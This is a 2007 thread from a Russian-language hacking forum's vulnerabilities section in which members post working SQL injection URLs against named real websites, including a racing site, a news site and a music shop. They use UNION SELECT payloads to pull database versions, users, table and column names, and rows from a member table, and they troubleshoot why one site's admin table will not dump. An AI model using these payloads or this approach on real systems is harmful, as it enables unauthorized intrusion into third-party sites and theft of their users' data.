HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.04.2007, 14:43
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

Цитата:
http://mrg.net.ru/showrel07.php?ID=-1+union+select+1,2,3,4/*
сим-рейсинг
 
Ответить с цитированием

  #2  
Старый 07.04.2007, 15:05
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

Цитата:
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=topic&id=-1+union+select+1,2,3,4,5,6,7/*
гы а я тут как то участвовал)) дальше не полезу, носков нету, а то забанят ещё)
 
Ответить с цитированием

  #3  
Старый 07.04.2007, 15:08
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

Цитата:
http://www.cyberacing.ru/index.php?lang=ru&p=105&action=storage&stamp=-1+union+select+1,2,3,4,5,6,7/*
в самом низу
 
Ответить с цитированием

  #4  
Старый 07.04.2007, 16:03
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.tass-ural.ru/news/?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+52,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,table_name+from+information_schema.tables+limit+55,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=char(109,101,109,98,101,114)+limit+0,1/*
http://www.tass-ural.ru/news/?id=-1+union+select+1,convert(concat(id,char(58),fio,char(58),job),char)+from+member+limit+0,1/*
Код:
http://www.skladcd.com/?index=3&cat=4&cdinfo=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4/*
 
Ответить с цитированием

  #5  
Старый 07.04.2007, 16:06
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
чето нигде не выводит
 
Ответить с цитированием

  #6  
Старый 08.04.2007, 12:47
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


По умолчанию

Цитата:
Сообщение от XTErner  
Код:
http://www.marycoughlanmusic.com/shop.php?id=-47%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
чето нигде не выводит
У меня всё прекрасно выводит:
Код:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 08.04.2007 в 13:45..
 
Ответить с цитированием

  #7  
Старый 08.04.2007, 14:49
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от ShadOS  
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
Такая же трабла.
 
Ответить с цитированием

  #8  
Старый 08.04.2007, 15:50
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Цитата:
Сообщение от ShadOS  
У меня всё прекрасно выводит:
Код:
_http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,USER(),4,version(),database(),7,8,9,10,11,12/*
Но как только обращаешься к таблице, то пусто. Какая-то хитрая фильтрация. Кто знает что здесь сделать? Оч. Интересно.
У меня все выводиться
Цитата:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 +from+INFORMATION_SCHEMA.TABLES+limit+2,2/*
лимитом перебираем таблицы, подом колонки получаем базу.
управление:Opera 9.10
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #9  
Старый 08.04.2007, 16:12
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


По умолчанию

Constantine, а из таблицы admin почему тогда данные не выводятся? Таблица присутствует:
Код:
http://www.marycoughlanmusic.com/shop.php?id=-4+UNION+SELECT+1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12%20+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
Так что извиняй, это не то что хотелось бы. Дело в том, что даже простое обращение типа вот этого:
Код:
http://www.marycoughlanmusic.com/shop.php?id=-47+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
Уже не работает!
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 08.04.2007 в 16:19..
 
Ответить с цитированием

  #10  
Старый 07.04.2007, 16:30
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


По умолчанию

Цитата:
2alextoun
там какая то хрень с кодировками
всё там нормально
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.